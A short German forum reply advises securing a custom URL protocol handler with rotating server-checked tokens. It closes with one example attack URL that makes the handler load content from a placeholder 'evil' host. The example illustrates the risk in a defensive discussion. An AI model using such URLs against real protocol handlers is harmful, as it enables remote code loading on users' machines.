(1) Ein Zufallszahl sollte ausreichen
(2) Das Clientprogramm schickt einen http-Request an den Server, der Server antwortet ob der Token gültig ist oder nicht. Näturlich sollte der Token täglich (oder öfters) geändert werden. Im Falle eines ungültigen Tokens sollte dann eine Warnmeldung kommen.
(3) Wenn du darauf verzichtest hast du ein potenzielles Sicherheitsproblem, wie kritisch das ist kann ich nicht beurteilen. Natürlich benötigt man für die Ausnutzung internes Wissen (mindestens den Protokollnamen und einige Befehle). Wie sicher du deine Software gestaltest bleibt natürlich dir überlassen. Wenn du nur den Namen der Steuerdatei übergibst hast du natürlich dadurch die Sicherheit das nur vom Server erstellte befehle ausgeführt werden können (es sei den man kann sowas machen myone://execute?url=http://evil_url_that_load_something_bad)

Gruß Björn